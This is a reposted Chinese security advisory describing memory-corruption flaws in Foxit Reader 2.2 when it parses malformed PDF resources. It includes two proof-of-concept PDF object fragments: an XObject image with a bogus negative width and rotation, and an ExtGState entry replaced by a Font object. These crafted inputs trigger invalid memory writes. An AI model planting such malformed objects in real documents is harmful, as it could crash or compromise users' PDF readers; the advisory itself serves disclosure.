Foxit Reader PDF文件解析内存破坏漏洞

2023-12-04 0 283

受影响系统:

Foxit Foxit Reader 2.2

描述:

——————————————————————————–

BUGTRAQ ID: 28890

Foxit Reader是一款小型的PDF文档查看器和打印程序。

Foxit Reader处理包含有畸形/XObject资源的网页时存在漏洞,用户在处理恶意文件时会导致Foxit Reader崩溃。

当使用Foxit Reader旋转包含有畸形/XObject资源的网页时(或向页面添加了/Rotate字段):

4 0 obj

<< /Type /Page

/Parent 3 0 R

/Rotate 170

/Contents [ 25 0 R ]

/Resources <<

/ProcSet [ /PDF /Text /ImageB /ImageC ]

/XObject <</Im23 23 0 R>>/Font << /TT3 33 0 R >>>>

>>

endobj

23 0 obj

<</Length 11643/Filter/DCTDecode/Width -28986631481/Height 5/BitsPerComponent 8/ColorSpace/DeviceRGB/Type/#6eject/Name/#4825#6#25n#00°#6e#6en#25n#72&Acirc;ƒ&Eacute;#25n™#r3/Subtype/Image>>

stream

……………………

endstream

endobj

如果修改了宽度和高度字段,Foxit就会对各种内存地址执行无效的写访问。

解析畸形的/ExtGState资源时也存在内存破坏漏洞。在这种情况下用/Font资源替换了ExtGState资源,但资源类型仍为ExtGState:

261 0 obj

<</Type /Page /Parent 126 0 R /MediaBox [0 0 259 408 ]/CropBox [0 0 531 666 ]/Resources <</ProcSet [/PDF /Text] /ExtGState <</R7 7 0 R>>>> /Contents [20 0 R]>>

endobj

7 0 obj

<</FirstChaaa 1

/Type /Funt /FontDescriptor 23 0 R

/BaseFont /xxxxxxxxxxxxxxxxoman,Italic

/Subtype /TrueType

/Encoding /WinAnsiEncoding

/LaitChar 211

/Wodths [ ]

>>

endobj

23 0 obj

<</zzz9&eth;E /oooooo>>

endobj

一些函数解析任何资源类型的任何字段,因此当/ExtGState资源下存在/Font字段时,仍会读取并解释这些字段,导致用错误的数据填充所分配的结构。

<*来源:Javier Vicente Vallejo

链接:http://www.vallejo.cc/proyectos/foxitreader1.htm

http://www.vallejo.cc/proyectos/foxitreader2.htm

http://secunia.com/advisories/29934/

*>

建议:

——————————————————————————–

厂商补丁:

Foxit

—–

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.foxitsoftware.com/pdf/rd_intro.php

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 漏洞分析 Foxit Reader PDF文件解析内存破坏漏洞 https://www.u-9.cn/security/fenxi/72512.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务